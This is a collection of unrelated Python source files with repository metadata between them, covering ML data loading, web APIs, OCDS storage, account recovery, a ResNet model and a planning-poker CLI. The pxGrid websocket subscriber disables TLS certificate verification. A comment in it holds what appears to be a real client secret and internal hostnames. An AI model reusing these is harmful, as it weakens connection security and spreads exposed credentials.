self._sem.acquire()
if self._count < self._pool_size:
self._X[self._count] = x
self._Y[self._count] = y
self._count += 1
else:
idx = randint(0,self._pool_size-1)
self._X[idx] = x
self._Y[idx] = y
self._sem.release()
def _run(self):
while True:
x,y = self._compute_sample()
self._insert_data(x,y)
if self._stop:
break
def stop(self):
self._stop = True
for thread in self._threads:
thread.join()
def start(self):
self._stop = False
self._threads = [Thread(target=self._run) for n in range(self._nthreads)]
for thread in self._threads:
thread.setDaemon(True)
thread.start()
def get_batch(self,N):
# Wait until the buffer was filled with the minimum
# number of samples
while self._count < self._min_nsamples:
sleep(.1)
X,Y = self._get_buffers(N)
self._sem.acquire()
for i in range(N):
idx = randint(0,self._count-1)
X[i] = self._X[idx]
Y[i] = self._Y[idx]
self._sem.release()
return X,Y
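# Usage sketch (illustrative; the process function, shapes and data below are
# hypothetical, not part of this module):
#
#   def process_item(item):
#       # turn one raw data item into an (x, y) training pair
#       return item['image'], item['label']
#
#   gen = DataGenerator(data=my_items, process_data_item_func=process_item,
#                       xshape=(208, 208, 3), yshape=(9,),
#                       nthreads=2, pool_size=1000, min_nsamples=100)
#   gen.start()                           # launch the background filler threads
#   Xtrain, Ytrain = gen.get_batch(32)    # sample a batch from the pool
#   gen.stop()                            # join the worker threads when done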
| 22.90099 | 75 | 0.68396 |
744823f4de74587e3be2b669095496c9f29d0169
| 315 |
py
|
Python
|
tests/test_linear/test_variational_regression.py
|
ctgk/bayesian_playground
|
70c63910472a29e15a4fb98e30a34b9ee155152e
|
[
"MIT"
] | 1 |
2020-10-17T19:09:32.000Z
|
2020-10-17T19:09:32.000Z
|
tests/test_linear/test_variational_regression.py
|
ctgk/bayesian
|
70c63910472a29e15a4fb98e30a34b9ee155152e
|
[
"MIT"
] | null | null | null |
tests/test_linear/test_variational_regression.py
|
ctgk/bayesian
|
70c63910472a29e15a4fb98e30a34b9ee155152e
|
[
"MIT"
] | null | null | null |
import numpy as np
import pytest
from bayesian.linear import VariationalRegression
def test_fit():
model = VariationalRegression(1, 1, 100)
model.fit([-1, 1], [-1, 1])
assert np.allclose(model.predict([-1, 1])[0], [-1, 1], rtol=0., atol=1e-2)
if __name__ == "__main__":
pytest.main([__file__])
| 21 | 78 | 0.657143 |
5a1802a406647a3627f8e217b02765c64fb0fdd1
| 336 |
py
|
Python
|
python3.7/app/main.py
|
brdhunga/uvicorn-gunicorn-fastapi-docker
|
a7ff8f5fd3e5b9a8a76ce74a7b1c03071a7dc8b1
|
[
"MIT"
] | null | null | null |
python3.7/app/main.py
|
brdhunga/uvicorn-gunicorn-fastapi-docker
|
a7ff8f5fd3e5b9a8a76ce74a7b1c03071a7dc8b1
|
[
"MIT"
] | null | null | null |
python3.7/app/main.py
|
brdhunga/uvicorn-gunicorn-fastapi-docker
|
a7ff8f5fd3e5b9a8a76ce74a7b1c03071a7dc8b1
|
[
"MIT"
] | null | null | null |
import sys
import asyncio
from fastapi import FastAPI
version = f"{sys.version_info.major}.{sys.version_info.minor}"
app = FastAPI()
@app.get("/")
async def read_root():
await asyncio.sleep(7)
message = f"Hello world! From FastAPI running on Uvicorn with Gunicorn. Using Python {version}"
return {"message": message}
| 18.666667 | 99 | 0.714286 |
86c0dd855cdc44058c3fbd7d4b0289900fa9f117
| 5,514 |
py
|
Python
|
ocdskingfisher/store.py
|
odscjames/rhs-alpha
|
3ad01aea09e4768210d16dea5afdec45adb80d89
|
[
"BSD-3-Clause"
] | null | null | null |
ocdskingfisher/store.py
|
odscjames/rhs-alpha
|
3ad01aea09e4768210d16dea5afdec45adb80d89
|
[
"BSD-3-Clause"
] | null | null | null |
ocdskingfisher/store.py
|
odscjames/rhs-alpha
|
3ad01aea09e4768210d16dea5afdec45adb80d89
|
[
"BSD-3-Clause"
] | null | null | null |
import json
from ocdskingfisher.database import DatabaseStore
class Store:
def __init__(self, config, database):
self.config = config
self.collection_id = None
self.database = database
def load_collection(self, collection_source, collection_data_version, collection_sample):
self.collection_id = self.database.get_or_create_collection_id(collection_source, collection_data_version, collection_sample)
def store_file_from_local(self, filename, url, data_type, encoding, local_filename):
if data_type == 'release_package_json_lines' or data_type == 'record_package_json_lines':
try:
with open(local_filename, encoding=encoding) as f:
number = 0
raw_data = f.readline()
while raw_data:
self.store_file_item(filename, url, data_type, json.loads(raw_data), number)
raw_data = f.readline()
number += 1
except Exception as e:
raise e
# TODO Store error in database and make nice HTTP response!
else:
try:
with open(local_filename, encoding=encoding) as f:
data = json.load(f)
except Exception as e:
raise e
# TODO Store error in database and make nice HTTP response!
objects_list = []
if data_type == 'record_package_list_in_results':
objects_list.extend(data['results'])
elif data_type == 'release_package_list_in_results':
objects_list.extend(data['results'])
elif data_type == 'record_package_list' or data_type == 'release_package_list':
objects_list.extend(data)
else:
objects_list.append(data)
number = 0
for item_data in objects_list:
try:
self.store_file_item(filename, url, data_type, item_data, number)
number += 1
except Exception as e:
raise e
# TODO Store error in database and make nice HTTP response!
self.database.mark_collection_file_store_done(self.collection_id, filename)
def store_file_item_from_local(self, filename, url, data_type, encoding, number, local_filename):
try:
with open(local_filename, encoding=encoding) as f:
data = json.load(f)
except Exception as e:
raise e
# TODO Store error in database and make nice HTTP response!
try:
self.store_file_item(filename, url, data_type, data, number)
except Exception as e:
raise e
# TODO Store error in database and make nice HTTP response!
def store_file_item(self, filename, url, data_type, json_data, number):
if not isinstance(json_data, dict):
raise Exception("Can not process data as JSON is not an object")
with DatabaseStore(database=self.database, collection_id=self.collection_id, file_name=filename, number=number) as store:
if data_type == 'release' or data_type == 'record':
data_list = [json_data]
elif data_type == 'release_package' or \
data_type == 'release_package_json_lines' or \
data_type == 'release_package_list_in_results' or \
data_type == 'release_package_list':
if 'releases' not in json_data:
                    # this flag is not set in __init__, so guard the lookup
                    if data_type == 'release_package_json_lines' and \
                            getattr(self, 'ignore_release_package_json_lines_missing_releases_error', False):
                        return
raise Exception("Release list not found")
elif not isinstance(json_data['releases'], list):
raise Exception("Release list which is not a list found")
data_list = json_data['releases']
elif data_type == 'record_package' or \
data_type == 'record_package_json_lines' or \
data_type == 'record_package_list_in_results' or \
data_type == 'record_package_list':
if 'records' not in json_data:
raise Exception("Record list not found")
elif not isinstance(json_data['records'], list):
raise Exception("Record list which is not a list found")
data_list = json_data['records']
else:
raise Exception("data_type not a known type")
package_data = {}
if not data_type == 'release':
for key, value in json_data.items():
if key not in ('releases', 'records'):
package_data[key] = value
for row in data_list:
if not isinstance(row, dict):
raise Exception("Row in data is not a object")
if data_type == 'record' or \
data_type == 'record_package' or \
data_type == 'record_package_json_lines' or \
data_type == 'record_package_list_in_results' or \
data_type == 'record_package_list':
store.insert_record(row, package_data)
else:
store.insert_release(row, package_data)
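# Usage sketch (illustrative; the config/database objects and file details are
# assumed to be created elsewhere in kingfisher):
#
#   store = Store(config, database)
#   store.load_collection('example-source', '2018-01-01 00:00:00', False)
#   store.store_file_from_local(
#       filename='page-1.json',
#       url='https://example.com/releases?page=1',
#       data_type='release_package',
#       encoding='utf-8',
#       local_filename='/tmp/page-1.json')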
| 42.415385 | 133 | 0.566739 |
5c9af6a2a5eca3c4b85b521e56c4bc47addeefae
| 3,703 |
py
|
Python
|
{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/handlers/auth/recovery.py
|
thecoderstudio/cookiecutter-pyramid-api
|
b3122c0d98be7179bcf726c6527096c0327d7bb7
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/handlers/auth/recovery.py
|
thecoderstudio/cookiecutter-pyramid-api
|
b3122c0d98be7179bcf726c6527096c0327d7bb7
|
[
"MIT"
] | 1 |
2021-12-17T15:10:21.000Z
|
2021-12-17T15:10:21.000Z
|
{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/handlers/auth/recovery.py
|
thecoderstudio/cookiecutter-pyramid-api
|
b3122c0d98be7179bcf726c6527096c0327d7bb7
|
[
"MIT"
] | 1 |
2021-03-01T14:27:10.000Z
|
2021-03-01T14:27:10.000Z
|
import random
import time
from secrets import token_hex
from pyramid.httpexceptions import HTTPCreated
from pyramid.view import view_defaults
from sqlalchemy.orm.exc import NoResultFound
from {{cookiecutter.project_slug}}.handlers import view_config
from {{cookiecutter.project_slug}}.handlers.auth import LoginHandler
from {{cookiecutter.project_slug}}.lib.decorators import validate
from {{cookiecutter.project_slug}}.lib.factories.auth.recovery import AccountRecoveryFactory
from {{cookiecutter.project_slug}}.lib.hash import hash_plaintext
from {{cookiecutter.project_slug}}.lib.middleware.sendgrid import SendGridClient
from {{cookiecutter.project_slug}}.lib.schemas.auth import (AccountRecoveryLoginSchema,
AccountRecoverySchema)
from {{cookiecutter.project_slug}}.lib.security.auth import AuthWithRecoveryTokenManager
from {{cookiecutter.project_slug}}.models import save
from {{cookiecutter.project_slug}}.models.security.recovery_token import RecoveryToken
from {{cookiecutter.project_slug}}.models.user import get_one_user_by_email_address, User
NUMBER_OF_TOKEN_BYTES = 3
TOKEN_TTL_IN_SECONDS = 7200
MIN_TIME_PADDING_IN_DECISECONDS = 2
MAX_TIME_PADDING_IN_DECISECONDS = 8
@view_defaults(
containment=AccountRecoveryFactory,
context=AccountRecoveryFactory,
renderer='json'
)
class AccountRecoveryHandler(LoginHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.auth_manager = AuthWithRecoveryTokenManager(self.request)
@validate(AccountRecoverySchema())
@view_config(
path_hints=['/auth/recover-account'],
request_schema_class=AccountRecoverySchema,
permission='recovery.request_token',
tags=['authentication', 'account recovery'],
request_method='POST',
public_hint=True
)
def request_account_recovery_token(self, request_data):
response = HTTPCreated()
token = token_hex(NUMBER_OF_TOKEN_BYTES)
email_address = request_data['email_address']
self._prevent_user_enumeration()
try:
recipient = get_one_user_by_email_address(email_address)
self._invalidate_any_current_recovery_token(recipient)
self._save_recovery_token(recipient, token)
SendGridClient().send_account_recovery_email(email_address, token)
except NoResultFound:
# To avoid user enumeration we don't indicate failure.
pass
raise response
@staticmethod
def _prevent_user_enumeration():
time.sleep(random.randint(
MIN_TIME_PADDING_IN_DECISECONDS,
MAX_TIME_PADDING_IN_DECISECONDS
) / 10)
@staticmethod
def _invalidate_any_current_recovery_token(user):
try:
user.active_recovery_token.invalidate()
except AttributeError:
pass
@staticmethod
def _save_recovery_token(for_user: User, token: str):
token_hash, token_salt = hash_plaintext(token)
recovery_token = RecoveryToken(
token_hash=token_hash,
token_salt=token_salt,
for_user=for_user
)
save(recovery_token)
@validate(AccountRecoveryLoginSchema())
@view_config(
path_hints=['/auth/recover-account/login'],
request_schema_class=AccountRecoveryLoginSchema,
permission='recovery.login',
request_method='POST',
successful_response_code=200,
tags=['authentication', 'account recovery'],
name='login',
public_hint=True
)
def login(self, login_data):
self.auth_manager.login(login_data)
raise self.request.response
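# Request-flow sketch (paths come from the path_hints above; host, token and
# addresses are hypothetical):
#
#   POST /auth/recover-account
#       {"email_address": "user@example.com"}
#       -> 201 Created (always, to avoid user enumeration)
#
#   POST /auth/recover-account/login
#       body validated by AccountRecoveryLoginSchema, carrying the 6-hex-char
#       token from the recovery e-mail (token_hex(3) above)
#       -> 200 OK on success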
| 35.951456 | 92 | 0.719147 |
c4f2528af9c2d70ff5fd86fa2bfab554e730e0d0
| 236 |
py
|
Python
|
pysrc/__init__.py
|
uuosio/uuosk
|
505d93ebac9e158bf96c2420a7dc7ca84c73eea4
|
[
"MIT"
] | 5 |
2021-03-01T10:46:32.000Z
|
2022-02-25T05:28:15.000Z
|
pysrc/__init__.py
|
uuosio/uuoskit
|
505d93ebac9e158bf96c2420a7dc7ca84c73eea4
|
[
"MIT"
] | 2 |
2021-06-13T18:12:52.000Z
|
2022-02-26T02:59:26.000Z
|
pysrc/__init__.py
|
uuosio/uuoskit
|
505d93ebac9e158bf96c2420a7dc7ca84c73eea4
|
[
"MIT"
] | null | null | null |
import os
import sys
from .http_client import HttpClient
from .rpc_interface import RPCInterface, WalletClient
from .chainapi_sync import ChainApi
from uuoskit import _uuoskit
__version__='1.0.4'
_uuoskit.init()
uuosapi = ChainApi()
| 18.153846 | 53 | 0.813559 |
69105b40ac3431c58d9711f315cf55dd4f4b8a35
| 29 |
py
|
Python
|
moyu_engine/config/__init__.py
|
MoYuStudio/MoYuEngine
|
7d9ab5c9cb268de0071e798a3288f0bbb651795e
|
[
"Apache-2.0"
] | 2 |
2022-03-22T02:32:34.000Z
|
2022-03-22T02:32:43.000Z
|
moyu_engine/config/__init__.py
|
MoYuStudio/MoYuEngine
|
7d9ab5c9cb268de0071e798a3288f0bbb651795e
|
[
"Apache-2.0"
] | null | null | null |
moyu_engine/config/__init__.py
|
MoYuStudio/MoYuEngine
|
7d9ab5c9cb268de0071e798a3288f0bbb651795e
|
[
"Apache-2.0"
] | null | null | null |
from .global_config import *
| 14.5 | 28 | 0.793103 |
bf906b708f2a907d0ce4a0405ee3587df52b5352
| 2,431 |
py
|
Python
|
runner/ws_ingest/subscribe.py
|
abhid/helix
|
127d445a7a79ffc0c8a2a882784078bfa2b43e72
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
runner/ws_ingest/subscribe.py
|
abhid/helix
|
127d445a7a79ffc0c8a2a882784078bfa2b43e72
|
[
"BSD-3-Clause-Clear"
] | 13 |
2020-02-29T06:07:34.000Z
|
2022-02-26T20:15:48.000Z
|
runner/ws_ingest/subscribe.py
|
abhid/helix
|
127d445a7a79ffc0c8a2a882784078bfa2b43e72
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
import asyncio
from asyncio.tasks import FIRST_COMPLETED
import ssl
import json
import sys
import time
from websockets import ConnectionClosed
from ws_stomp import WebSocketStomp
import redis
import argparse
def key_enter_callback(event):
sys.stdin.readline()
event.set()
async def future_read_message(ws, future):
try:
message = await ws.stomp_read_message()
future.set_result(message)
except ConnectionClosed:
print('Websocket connection closed')
async def subscribe_loop(nodename, secret, ws_url, pubsub_node, topic):
ws = WebSocketStomp(ws_url, nodename, secret, ssl._create_unverified_context())
r = redis.Redis(host='localhost', port=6379, db=0)
await ws.connect()
await ws.stomp_connect(pubsub_node)
await ws.stomp_subscribe(topic)
# setup keyboard callback
stop_event = asyncio.Event()
asyncio.get_event_loop().add_reader(sys.stdin, key_enter_callback, stop_event)
print("press <enter> to disconnect...")
while True:
future = asyncio.Future()
future_read = future_read_message(ws, future)
await asyncio.wait([stop_event.wait(), future_read], return_when=FIRST_COMPLETED)
if not stop_event.is_set():
message = json.loads(future.result())
r.rpush("stomp:"+topic, json.dumps(message))
# [print(i["state"] + " | " + i["userName"]) for i in message["sessions"]]
else:
await ws.stomp_disconnect('123')
# wait for receipt
await asyncio.sleep(3)
await ws.disconnect()
break
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--nodename', help='pxGrid controller node name')
parser.add_argument('-w', '--webservice', help='pxGrid webservice path')
parser.add_argument('-t', '--topic', help='webservice topic')
parser.add_argument('-u', '--username', help='Client node name')
parser.add_argument('-p', '--password', help='Password (optional)')
config = parser.parse_args()
asyncio.get_event_loop().run_until_complete(subscribe_loop(config.username, config.password, config.webservice, config.nodename, config.topic))
# asyncio.get_event_loop().run_until_complete(subscribe_loop("isebox", "MDDqnieTIgzwAoq8", "wss://e-tddc-ise2-psn4.medcampus.org:8910/pxgrid/ise/pubsub", "e-tddc-ise2-psn4.medcampus.org", "/topic/com.cisco.ise.session"))
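# Invocation sketch (all values are placeholders, not real hosts/credentials):
#
#   python subscribe.py \
#       -u my-client-node -p my-secret \
#       -w wss://ise-pxgrid.example.org:8910/pxgrid/ise/pubsub \
#       -n ise-pxgrid.example.org \
#       -t /topic/com.cisco.ise.session
#
# Received STOMP messages are pushed to the local Redis list "stomp:<topic>".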
| 41.20339 | 224 | 0.69313 |
0f5c21d2ac525e624337db26a330bed69c73e03b
| 1,279 |
py
|
Python
|
makelink.py
|
murattatar/Steemit-Manuel-Search-Tool
|
13d856fa175f4388d6a06d4666ebcb715d7745ff
|
[
"MIT"
] | null | null | null |
makelink.py
|
murattatar/Steemit-Manuel-Search-Tool
|
13d856fa175f4388d6a06d4666ebcb715d7745ff
|
[
"MIT"
] | null | null | null |
makelink.py
|
murattatar/Steemit-Manuel-Search-Tool
|
13d856fa175f4388d6a06d4666ebcb715d7745ff
|
[
"MIT"
] | null | null | null |
########################################
## Month names, November 2017 by Murat Tatar
## Baglanti fonksiyonu: https://forum.ubuntu-tr.net/index.php?topic=37782.msg453829#msg453829
########################################
def MakeLink(word):
list = {"ı": "i",
"I": "i",
"Ç": "c",
"ç": "c",
" ": "-",
"ş": "s",
"Ş": "s",
"Ğ": "g",
"ğ": "g",
"Ü": "u",
"ü": "u",
"Ö": "o",
"ö": "o"}
word = word.encode('utf8', 'replace')
for ltr in list:
word = word.replace(ltr, list[ltr])
return word.lower()
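# Example (illustrative): MakeLink(u"Ağustos Ayı") -> "agustos-ayi"
# (Turkish characters are transliterated, spaces become dashes, and the
# result is lower-cased.)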
def TurkceAy(ingAy):
if ingAy == "January": trAy=u"Ocak"
elif ingAy == "February": trAy=u"Şubat"
elif ingAy == "March": trAy=u"Mart"
elif ingAy == "April": trAy=u"Nisan"
elif ingAy == "May": trAy=u"Mayıs"
elif ingAy == "June": trAy=u"Haziran"
elif ingAy == "July": trAy=u"Temmuz"
elif ingAy == "August": trAy=u"Ağustos"
elif ingAy == "September": trAy=u"Eylül"
elif ingAy == "October": trAy=u"Ekim"
elif ingAy == "November": trAy=u"Kasım"
elif ingAy == "December": trAy=u"Aralık"
    else: trAy = ingAy  # fall back to the English name for unexpected input
    return trAy
| 26.102041 | 94 | 0.436278 |
0c51dcf3fdb890eda3cc107a0acbbbc652b1ebc0
| 6,051 |
py
|
Python
|
gluoncv/model_zoo/faster_rcnn/resnet50_v2a.py
|
leezu/gluon-cv
|
03ec37c7813da1845f7f287bba0452a7b95a3fa4
|
[
"Apache-2.0"
] | 1 |
2019-01-26T23:55:59.000Z
|
2019-01-26T23:55:59.000Z
|
gluoncv/model_zoo/faster_rcnn/resnet50_v2a.py
|
leezu/gluon-cv
|
03ec37c7813da1845f7f287bba0452a7b95a3fa4
|
[
"Apache-2.0"
] | null | null | null |
gluoncv/model_zoo/faster_rcnn/resnet50_v2a.py
|
leezu/gluon-cv
|
03ec37c7813da1845f7f287bba0452a7b95a3fa4
|
[
"Apache-2.0"
] | null | null | null |
# pylint: disable=arguments-differ
"""Resnet50 v2a model which take original image with zero mean and uniform std."""
import mxnet as mx
from mxnet.gluon import nn, HybridBlock
__all__ = ['resnet50_v2a']
def _conv3x3(channels, stride, in_channels):
"""add conv 3x3 block."""
return nn.Conv2D(channels, kernel_size=3, strides=stride, padding=1,
use_bias=False, in_channels=in_channels)
class BottleneckV2(HybridBlock):
"""Bottleneck V2 for internal use."""
def __init__(self, channels, stride, downsample=False, in_channels=0, **kwargs):
super(BottleneckV2, self).__init__(**kwargs)
self.bn1 = nn.BatchNorm(epsilon=2e-5, use_global_stats=True)
self.conv1 = nn.Conv2D(channels // 4, kernel_size=1, strides=1, use_bias=False)
self.bn2 = nn.BatchNorm(epsilon=2e-5, use_global_stats=True)
self.conv2 = _conv3x3(channels // 4, stride, channels // 4)
self.bn3 = nn.BatchNorm(epsilon=2e-5, use_global_stats=True)
self.conv3 = nn.Conv2D(channels, kernel_size=1, strides=1, use_bias=False)
if downsample:
self.downsample = nn.Conv2D(channels, 1, stride, use_bias=False,
in_channels=in_channels)
else:
self.downsample = None
def hybrid_forward(self, F, x):
"""Custom forward."""
residual = x
x = self.bn1(x)
x = F.Activation(x, act_type='relu')
if self.downsample:
residual = self.downsample(x)
x = self.conv1(x)
x = self.bn2(x)
x = F.Activation(x, act_type='relu')
x = self.conv2(x)
x = self.bn3(x)
x = F.Activation(x, act_type='relu')
x = self.conv3(x)
return x + residual
class Rescale(HybridBlock):
"""Rescale layer/block that restore the original by
the default mean [0.485, 0.456, 0.406] and std [0.229, 0.224, 0.225].
"""
def __init__(self, **kwargs):
super(Rescale, self).__init__(**kwargs)
with self.name_scope():
init_scale = mx.nd.array([0.229, 0.224, 0.225]).reshape((1, 3, 1, 1)) * 255
self.init_scale = self.params.get_constant('init_scale', init_scale)
init_mean = mx.nd.array([0.485, 0.456, 0.406]).reshape((1, 3, 1, 1)) * 255
self.init_mean = self.params.get_constant('init_mean', init_mean)
def hybrid_forward(self, F, x, init_scale, init_mean):
"""Restore original image scale."""
x = F.broadcast_mul(x, init_scale) # restore std
x = F.broadcast_add(x, init_mean) # restore mean
return x
class ResNet50V2(HybridBlock):
"""Resnet v2(a) for Faster-RCNN.
    Please ignore this if you are looking for a model for other tasks.
"""
def __init__(self, **kwargs):
super(ResNet50V2, self).__init__(**kwargs)
with self.name_scope():
self.rescale = nn.HybridSequential(prefix='')
self.rescale.add(Rescale(prefix=''))
self.layer0 = nn.HybridSequential(prefix='')
self.layer0.add(nn.BatchNorm(scale=False, epsilon=2e-5, use_global_stats=True))
self.layer0.add(nn.Conv2D(64, 7, 2, 3, use_bias=False))
self.layer0.add(nn.BatchNorm(epsilon=2e-5, use_global_stats=True))
self.layer0.add(nn.Activation('relu'))
self.layer0.add(nn.MaxPool2D(3, 2, 1))
self.layer1 = self._make_layer(stage_index=1, layers=3, in_channels=64,
channels=256, stride=1)
self.layer2 = self._make_layer(stage_index=2, layers=4, in_channels=256,
channels=512, stride=2)
self.layer3 = self._make_layer(stage_index=3, layers=6, in_channels=512,
channels=1024, stride=2)
self.layer4 = self._make_layer(stage_index=4, layers=3, in_channels=1024,
channels=2048, stride=2)
self.layer4.add(nn.BatchNorm(epsilon=2e-5, use_global_stats=True))
self.layer4.add(nn.Activation('relu'))
# self.layer4.add(nn.GlobalAvgPool2D())
# self.layer4.add(nn.Flatten())
def _make_layer(self, stage_index, layers, channels, stride, in_channels=0):
layer = nn.HybridSequential(prefix='stage%d_' % stage_index)
with layer.name_scope():
layer.add(BottleneckV2(channels, stride, channels != in_channels,
in_channels=in_channels, prefix=''))
for _ in range(layers - 1):
layer.add(BottleneckV2(channels, 1, False, in_channels=channels, prefix=''))
return layer
# pylint: disable=unused-argument
def hybrid_forward(self, F, x):
"""Custom forward."""
x = self.rescale(x)
x = self.layer0(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
return x
def resnet50_v2a(pretrained=False, root='~/.mxnet/models', ctx=mx.cpu(0), **kwargs):
"""Constructs a ResNet50-v2a model.
    Please ignore this if you are looking for a model for other tasks.
Parameters
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
ctx : Context, default mx.cpu(0)
The context in which to load the pretrained weights.
    norm_layer : object
        Normalization layer used in backbone network
        (default: :class:`mxnet.gluon.nn.BatchNorm`).
"""
model = ResNet50V2(prefix='', **kwargs)
if pretrained:
from ..model_store import get_model_file
model.load_params(get_model_file('resnet%d_v%da'%(50, 2),
root=root), ctx=ctx, allow_missing=True)
for v in model.collect_params(select='init_scale|init_mean').values():
v.initialize(force_reinit=True, ctx=ctx)
return model
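# Usage sketch (illustrative; input size and context are arbitrary). The
# network expects images normalised with the standard ImageNet mean/std,
# which the Rescale block then maps back to raw 0-255 values:
#
#   net = resnet50_v2a(pretrained=False)
#   net.initialize(ctx=mx.cpu(0))
#   x = mx.nd.zeros((1, 3, 600, 800))   # NCHW batch
#   feat = net(x)                       # stride-32 feature map with 2048 channels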
| 42.020833 | 97 | 0.603867 |
0a58f62a5b300a4a0785b7579f3dade4c6724d5f
| 14,144 |
py
|
Python
|
delta_cli.py
|
Yashwanthdantanoor1/SER516_Project-1
|
ca6213c20d5eb219b745eded4fa6e5ac54412826
|
[
"MIT"
] | 1 |
2021-02-24T14:14:28.000Z
|
2021-02-24T14:14:28.000Z
|
delta_cli.py
|
Yashwanthdantanoor1/SER516_Project-1
|
ca6213c20d5eb219b745eded4fa6e5ac54412826
|
[
"MIT"
] | 3 |
2022-02-25T05:02:59.000Z
|
2022-03-06T06:02:40.000Z
|
delta_cli.py
|
Yashwanthdantanoor1/SER516_Project-1
|
ca6213c20d5eb219b745eded4fa6e5ac54412826
|
[
"MIT"
] | 2 |
2021-03-04T10:29:58.000Z
|
2022-01-31T06:33:19.000Z
|
import argparse
import json
import requests
import time
from cmd import Cmd
from fastapi import status
from pathlib import Path
class MyPrompt(Cmd):
prompt = 'planning_poker> '
intro = "Welcome to a nice game of Planning Poker!\nType ? to list commands"
default_config_params = {"max_retries": 5,
"show_timeout": 1,
"url": "http://localhost:8000"}
default_keys_set = set(default_config_params.keys())
def __init__(self, **config_params):
super().__init__()
self.username = None
keys_set = set(config_params.keys())
common_config_keys = self.default_keys_set.intersection(keys_set)
difference_config_keys = self.default_keys_set.difference(keys_set)
if len(difference_config_keys) == 0:
for config_key, config_value in config_params.items():
setattr(self, config_key, config_value)
else:
if len(difference_config_keys) < len(self.default_keys_set):
print("Not all parameters found in configuration file.")
for config_key in common_config_keys:
setattr(self, config_key, config_params[config_key])
print(f"Using default value for {difference_config_keys}")
for config_key in difference_config_keys:
setattr(self, config_key,
self.default_config_params[config_key])
def default(self, inp):
"""
You can also use x or q to exit the game. All commands that are
not implemented will just be printed with a notification
message.
"""
if inp == 'x' or inp == 'q':
return self.do_exit()
print(f"Haven't found this command: {inp}")
@staticmethod
def print_error_response(response):
if response.status_code == status.HTTP_400_BAD_REQUEST:
print(f"{json.loads(response.text)['detail']}")
elif response.status_code == status.HTTP_412_PRECONDITION_FAILED:
print(f"{json.loads(response.text)['detail']}")
elif response.status_code == status.HTTP_422_UNPROCESSABLE_ENTITY:
message = json.loads(response.text)['detail'][0]['msg']
print(f"{message.capitalize()}")
else:
print(f"{response.text}")
@staticmethod
def print_issue(response):
crt_issue_title = response['result_message']['title']
crt_issue_description = response['result_message']['description']
print(f"'{crt_issue_title}' is the current issue.")
if len(crt_issue_description) > 0:
print(f"{crt_issue_description}")
@staticmethod
def parse_report(report):
for vote_value, vote_details in report.items():
print(f"{vote_details['vote_count']} voted for {vote_value} "
f"story points.\n"
f"{json.dumps(vote_details['voters'], indent=4)}\n")
def get_report(self, inp):
current_status = 'pending'
retry_count = 0
while current_status == 'pending' and retry_count < self.max_retries:
response = self.send_request(method='get',
route='/issue/show_results')
if response.status_code == status.HTTP_200_OK:
response_message = json.loads(response.text)['result_message']
current_status = response_message['status']
if current_status == 'done':
self.parse_report(response_message['report'])
else:
current_status = 'error'
self.print_error_response(response)
retry_count += 1
time.sleep(self.show_timeout)
def send_request(self, method, route, params=None, data=None):
full_uri = ''.join([self.url, route])
response = requests.request(method=method, url=full_uri,
params=params, json=data)
return response
def do_add_player(self, username):
"""
Add a player to the current game
"""
current_players = []
response = self.send_request(method='get',
route='/user/show_all')
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
current_players = response_dict['result_message']['current_users']
else:
self.print_error_response(response)
if self.username and self.username in current_players:
print(f"You already have a username in the current game: "
f"{self.username}")
else:
crt_dict = {
'name': username
}
response = self.send_request(method='post',
route='/user/add',
data=crt_dict)
if response.status_code == status.HTTP_200_OK:
self.username = username
print(f"Player {self.username} has been added to the current "
f"game")
else:
self.print_error_response(response)
def do_current_dealer(self, inp):
"""
Show current dealer
"""
response = self.send_request(method='get',
route='/game/get_dealer')
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
print(f"Current dealer is "
f"{response_dict['result_message']['current_dealer']}")
else:
self.print_error_response(response)
def do_current_issue(self, inp):
"""
Show issue that players are voting on now
"""
response = self.send_request(method='get',
route='/issue/current')
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
self.print_issue(response_dict)
else:
self.print_error_response(response)
def do_current_players(self, inp):
"""
Show players that are registered for the current game
"""
response = self.send_request(method='get',
route='/user/show_all')
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
current_users = response_dict['result_message']['current_users']
if len(current_users) == 0:
print("Please add players to the game")
else:
print(f"Currently playing Planning Poker: "
f"{json.dumps(current_users)}")
else:
self.print_error_response(response)
def do_current_votes(self, inp):
"""
Show if all players voted or who still has to vote
"""
response = self.send_request(method='get',
route='/issue/vote_status')
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
print(f"{response_dict['result_message']}")
else:
self.print_error_response(response)
    def do_exit(self, inp=None):
"""
Command for exiting planning poker game
"""
crt_dict = {
'name': self.username
}
response = self.send_request(method='post',
route='/user/exit',
data=crt_dict)
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
print(f"{response_dict['result_message']['user_exit_status']}")
else:
self.print_error_response(response)
print(f"Buh-bye, {self.username}! And in case I don't see you again, "
f"good afternoon, good evening and good night!")
return True
def do_new_game(self, inp):
"""
Start new game
"""
crt_dict = {
'name': self.username
}
response = self.send_request(method='post',
route='/game/new',
data=crt_dict)
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
print(f"{response_dict['result_message']}")
else:
self.print_error_response(response)
def do_next_issue(self, inp):
"""
Jump to next issue, if there is one (i.e. the current issue
is the last one and we can go back to programming)
"""
crt_dict = {
'name': self.username
}
response = self.send_request(method='post',
route='/issue/next',
data=crt_dict)
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
self.print_issue(response_dict)
else:
self.print_error_response(response)
def do_previous_issue(self, inp):
"""
Jump to previous issue, if there is one (i.e. we are not on
the first issue)
"""
crt_dict = {
'name': self.username
}
response = self.send_request(method='post',
route='/issue/previous',
data=crt_dict)
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
self.print_issue(response_dict)
else:
self.print_error_response(response)
def do_remove_player(self, username):
"""
Remove a player from the current game
"""
if len(username) < 4:
print("Please use a more meaningful name")
else:
params_dict = {
'username': username
}
data_dict = {
